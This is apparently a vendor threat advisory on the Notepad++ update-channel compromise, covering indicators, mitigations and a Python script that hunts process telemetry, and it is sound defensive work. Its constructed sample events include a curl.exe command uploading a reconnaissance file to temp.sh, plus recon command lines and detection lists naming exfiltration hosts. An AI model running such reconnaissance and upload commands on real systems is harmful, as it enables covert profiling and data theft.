At a glance: New reporting has expanded the understanding of the Notepad++ supply‑chain compromise. Recent technical analysis and community‑sourced evidence show that the incident was a more advanced operation than previously assessed. Organizations should reassess their exposure, review logs for the indicators of compromise below, and apply the updated mitigations.
Threat summary
New analysis published on February 3, 2026, provides additional clarity on how threat actors leveraged the Notepad++ update mechanism. The latest findings confirm that the threat actors selectively manipulated Notepad++ auto‑update responses to deliver modified executables to specific IP address ranges, enabling them to collect reconnaissance data from targeted systems while avoiding broad detection.
The report by Securelist also shows that the activity was more diverse and technically complex than initially understood. Earlier assessments focused on activity in Asia, but the new analysis identifies victims in Vietnam, El Salvador, Australia, and the Philippines. Those affected included individuals, as well as a government organization, financial institution, and information technology service provider, indicating interest in those specific sectors and end users.
The adversaries used three distinct infection chains delivered through manipulated update responses, each executing reconnaissance commands, collecting system information, and uploading the results to a public file‑sharing service. This pattern matches a community observation from January 22, 2026, in which a user reported the Notepad++ updater sending collected data to temp.sh; Securelist’s findings indicate that this activity was part of the same operation.
The malicious update files executed commands such as systeminfo, tasklist, and whoami, wrote the output to a temporary file, and uploaded it using curl.exe. The collected data included system configuration, running processes, user accounts, and network state.
Analysis & mitigation
The operation shows how the compromised update channel was used to profile systems and identify potential high‑value targets, highlighting continued threat actor interest in software supply‑chain access.
A thorough response to this threat would include:
- Review endpoint logs for unexpected execution of reconnaissance commands (e.g., `systeminfo`, `tasklist`, `whoami`, `ipconfig`, `netstat`) initiated by the Notepad++ process, including commands launched through an intermediate shell such as `cmd.exe`, so check the full parent chain rather than only the immediate parent. Such activity would indicate that a compromised update may have been executed.
- Investigate outbound connections to `temp.sh` or other public file‑sharing or paste‑style services that may have been used for exfiltration or staging.
- Reinstall the latest version of Notepad++ from a trusted source, ensuring the environment is running a clean build. The current versions include hardened update‑signature verification, which prevents tampered or unsigned updates from being accepted going forward.
- Rotate credentials on any systems where reconnaissance activity may have occurred. In parallel, review DNS and network logs for signs of redirected update traffic or suspicious outbound requests and validate the integrity of Notepad++ binaries across managed endpoints to ensure no compromised executables remain.
- Monitor for unauthorized use of `curl.exe` or similar command‑line tools that may indicate scripted reconnaissance or data exfiltration. Additionally, review temporary directories for artifacts such as reconnaissance output files or scripts dropped during malicious activity.
- Note that running an older version of Notepad++ during the June–December 2025 compromise window does not automatically mean that a malicious certificate was installed. The compromised update infrastructure did not distribute fraudulent certificates to all users, and most systems never received them. In normal circumstances, and especially if certificates were never imported manually, the local certificate stores are typically clean and no unexpected entries should appear. Certificate verification is prudent where there are indicators of compromise, such as security alerts, unusual file hashes, or installers obtained from unofficial sources. Legitimate Notepad++ releases are signed with a GlobalSign certificate, so you should not see any self‑signed certificates referencing Notepad++, certificates from unknown or suspicious publishers, or entries with unclear or unusual names.
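The hunting steps above (reconnaissance commands under the Notepad++ process, uploads to temp.sh, and curl.exe use) can be run as one pass over process‑creation telemetry. The script below is an added example written for this page; it is not Field Effect's or Securelist's detection logic. It assumes events have already been normalised into dicts with `pid`, `ppid`, `image` and `cmdline` fields (the shape of a Sysmon Event ID 1 or EDR process‑start record), and it walks the parent chain so commands launched via an intermediate `cmd.exe` are still attributed to Notepad++. The sample events are constructed, and the assumption that the updater runs as `gup.exe` is an environment assumption to adjust to your own telemetry.

```python
import re
from dataclasses import dataclass

# Indicators named in the advisory above.
RECON_CMDS = {"systeminfo", "tasklist", "whoami", "ipconfig", "netstat"}
EXFIL_HOSTS = {"temp.sh"}
# Process names treated as "the Notepad++ process". gup.exe as the updater
# binary name is an assumption about the environment; adjust to your telemetry.
NOTEPADPP_IMAGES = {"notepad++.exe", "gup.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _commands_in(cmdline: str) -> set:
    """Recon commands referenced anywhere in a command line, e.g. inside
    'cmd.exe /c systeminfo > out.txt & whoami'."""
    found = set()
    for tok in re.split(r"[\s&|;>]+", cmdline):
        name = _basename(tok.strip('"')).removesuffix(".exe")
        if name in RECON_CMDS:
            found.add(name)
    return found


def _ancestors(ev: dict, by_pid: dict):
    """Yield parent events up the process tree. PID reuse is ignored: the
    sample is a single session, so a pid maps to one process."""
    seen = {ev["pid"]}
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen:
        yield cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])


def hunt(events: list) -> list:
    """Apply the three checks from the advisory to a list of process events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        image = _basename(ev["image"])
        from_npp = any(_basename(a["image"]) in NOTEPADPP_IMAGES
                       for a in _ancestors(ev, by_pid))
        # 1. Recon command (as the image itself or inside a shell command line)
        #    anywhere beneath a Notepad++ process.
        recon = _commands_in(ev["cmdline"]) | ({image.removesuffix(".exe")} & RECON_CMDS)
        if recon and from_npp:
            findings.append(Finding("recon_under_notepadpp", ev["pid"], ", ".join(sorted(recon))))
        # 2. Any command line referencing the file-sharing host used for exfiltration.
        hosts = {h for h in EXFIL_HOSTS if h in ev["cmdline"].lower()}
        if hosts:
            findings.append(Finding("filesharing_exfil", ev["pid"], ", ".join(sorted(hosts))))
        # 3. curl.exe spawned beneath Notepad++, whatever the destination.
        elif image == "curl.exe" and from_npp:
            findings.append(Finding("curl_under_notepadpp", ev["pid"], ev["cmdline"]))
    return findings


# Constructed sample telemetry (not real logs): one infected session plus an
# administrator running the same commands legitimately from their own shell.
TMP = r"C:\Users\alice\AppData\Local\Temp\1.txt"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": '"C:\\Program Files\\Notepad++\\notepad++.exe"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c systeminfo > {TMP}"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
    {"pid": 310, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c tasklist >> {TMP} & whoami >> {TMP}"},
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": f'curl.exe -F "file=@{TMP}" https://temp.sh/upload'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 501, "ppid": 500, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule:24} pid={f.pid:<5} {f.detail}")
```

On the sample, the three `cmd.exe`/`systeminfo.exe` launches under pid 200 and the `curl.exe` upload to temp.sh are reported, while the administrator's `whoami /all` under pid 500 is not, because its ancestry never reaches a Notepad++ process. Since `curl.exe` ships with current Windows builds, its presence alone is not an indicator; the parent chain and the destination are what carry the signal, which is why the third rule is scoped to the Notepad++ subtree.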
Field Effect MDR clients are well-protected with layered visibility across endpoints, network traffic, and post-compromise behavior that provides strong coverage against the tactics used in this type of supply-chain compromise.
Field Effect MDR users would be alerted via ARO if vulnerable versions or indicators of compromise are detected in their environment.